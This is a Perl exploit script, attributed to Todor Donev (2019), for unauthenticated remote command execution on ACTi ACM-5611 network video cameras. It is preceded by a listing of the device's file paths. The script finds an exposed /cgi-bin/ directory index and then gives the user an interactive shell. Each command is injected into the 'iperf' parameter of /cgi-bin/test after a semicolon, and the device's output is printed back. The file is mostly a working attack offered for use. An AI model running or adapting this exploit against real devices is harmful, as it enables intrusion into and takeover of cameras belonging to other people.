# # [ /usr/sbin/show_progress  
# # [ /usr/sbin/ddns_monitor  
# # [ /usr/sbin/wan_status  
# # [ /usr/sbin/adsl-connect  
# # [ /usr/sbin/adsl-setup  
# # [ /usr/sbin/acti_report  
# # [ /usr/sbin/pppd  
# # [ /usr/sbin/pppoe  
# # [ /usr/sbin/acti_upgrade  
# # [ /usr/sbin/thttpd_monitor  
# # [ /usr/sbin/acti_485  
# # [ /usr/sbin/dbg  
# # [ /usr/sbin/ntpclient  
# # [ /usr/sbin/acti_upgradem  
# # [ /usr/sbin/dhcp_retry  
# # [ /usr/sbin/pppoe_monitor  
# # [ /usr/sbin/acti_reboot  
# # [ /usr/sbin/acti_msg  
# # [ /usr/sbin/mount_tmpfs  
# # [ /usr/sbin/shell_relay  
# # [ /usr/sbin/acti_logger  
# # [ /usr/sbin/boot_ctrl  
# # [ /usr/sbin/acti_gpio  
# # [ /usr/sbin/acti_rs485  
# # [ /usr/sbin/acti_rtc  
# # [ /usr/sbin/acti_reg  
# # [ /usr/sbin/conf_sync  
# # [ /usr/sbin/conf_convert  
# # [ /usr/sbin/bin2devinfo  
# # [ /usr/sbin/audio_tester  
# # [ /usr/sbin/bin2profile  
# # [ /usr/sbin/acti-server  
# # [ /usr/bin/setsid  
# # [ /var/run/dev.bin  
# # [ /var/run/system_type  
# # [ /var/run/channel  
# # [ /var/run/sys_conf.bin  
# # [ /var/run/wan_state  
# # [ /var/run/wanip_config  
# # [ /var/run/encoder_run  
# # [ /var/log/systemlog.txt  
# # [ /var/log/wan_info_brief.txt  
# # [ /var/log/system_info_web.txt  
# # [ /var/log/system_info_url.txt  
# # [ /var/www/images/Space.gif  
# # [ /var/www/images/bar.gif  
# # [ /var/www/images/bar2.gif  
# # [ /var/www/images/icon.gif  
# # [ /var/www/images/layout.gif  
# # [ /var/www/images/r0-100.gif  
# # [ /var/www/images/header_red.jpg  
# # [ /var/www/images/ie_error.bmp  
# # [ /var/www/images/r0-255.gif  
# # [ /var/www/images/ptz_center_1.gif  
# # [ /var/www/images/ptz_down_1.gif  
# # [ /var/www/images/ptz_left_1.gif  
# # [ /var/www/images/ptz_leftdown_1.gif  
# # [ /var/www/images/ptz_leftup_1.gif  
# # [ /var/www/images/ptz_right_1.gif  
# # [ /var/www/images/ptz_rightdown_1.gif  
# # [ /var/www/images/ptz_rightup_1.gif  
# # [ /var/www/images/ptz_up_1.gif  
# # [ /var/www/images/add.jpg  
# # [ /var/www/images/delete.jpg  
# # [ /var/www/images/focusin.jpg  
# # [ /var/www/images/focusout.jpg  
# # [ /var/www/images/home.jpg  
# # [ /var/www/images/reset.jpg  
# # [ /var/www/images/tele.jpg  
# # [ /var/www/images/wide.jpg  
# # [ /var/www/images/Num00.jpg  
# # [ /var/www/images/Num01.jpg  
# # [ /var/www/cgi-bin/cmd/system  
# # [ /var/www/cgi-bin/cmd/mpeg4  
# # [ /var/www/cgi-bin/cmd/encoder  
# # [ /var/www/cgi-bin/cmd/.htpasswd  
# # [ /var/www/cgi-bin/80503736  
# # [ /var/www/cgi-bin/update  
# # [ /var/www/cgi-bin/updatem  
# # [ /var/www/cgi-bin/macdev  
# # [ /var/www/cgi-bin/system  
# # [ /var/www/cgi-bin/mpeg4  
# # [ /var/www/cgi-bin/test  
# # [ /var/www/cgi-bin/encoder  
# # [ /var/www/cgi-bin/web1.cgi  
# # [ /var/www/default.css  
# # [ /var/www/index.htm  
# # [ /var/www/profile/cze.bin  
# # [ /var/www/profile/dan.bin  
# # [ /var/www/profile/eng.bin  
# # [ /var/www/profile/fin.bin  
# # [ /var/www/profile/fre.bin  
# # [ /var/www/profile/ger.bin  
# # [ /var/www/profile/hun.bin  
# # [ /var/www/profile/ita.bin  
# # [ /var/www/profile/jap.bin  
# # [ /var/www/profile/lang_table.bin  
# # [ /var/www/profile/por.bin  
# # [ /var/www/profile/sch.bin  
# # [ /var/www/profile/spa.bin  
# # [ /var/www/profile/tch.bin  
# # [ /var/www/nvEPLMedia.ocx  
# # [ /var/www/pid  
# # [ #   
# #   
  
use strict;  
use HTTP::Request;  
use LWP::UserAgent;  
use WWW::UserAgent::Random;  
use HTML::TreeBuilder;  
$| = 1;  
  
print "\033[2J"; #clear the screen  
print "\033[0;0H"; #jump to 0,0  
  
print "[ ACTi ACM-5611 Video Camera Remote Command Execution Exploit  
[ ============================================================  
[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>  
";  
  
if(not defined $ARGV[0])  
{  
print "[ Usage: perl $0 [target]\n";  
print "[ Example: perl $0 192.168.1.1\n\n";  
exit;  
}  
my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0];  
  
my $user_agent = rand_ua("browsers");  
my $browser = LWP::UserAgent->new();  
$browser->timeout(10);  
$browser->agent($user_agent);  
my $target = $host."/cgi-bin/";  
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);   
my $response = $browser->request($request);  
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');  
if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){  
print "[ Server: ", $response->header('Server'), "\n";  
print "[ The target is vulnerable\n";  
print "[\n[ Directory Traversal\n";  
my $tree = HTML::TreeBuilder->new_from_content($response->as_string());  
my @files = $tree->look_down(_tag => 'a');  
print "[ ", $host.$_->attr('href'), "\n" for @files;  
print "[\n[ Got root?\n";  
while(1){  
my $cmd;  
print "[ \# ";  
chomp($cmd = <STDIN>);  
if($cmd eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}  
exit if $cmd eq 'exit';  
  
my $target = $host."/cgi-bin/test?iperf=;".$cmd;  
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);  
my $response = $browser->request($request) or die "[ Exploit Failed: $!";  
print "[ ", $_, "\n" for split(/\n/,$response->content());  
}  
  
  
} else {   
print "[ Exploit failed! The target isn't vulnerable\n";  
exit;  
}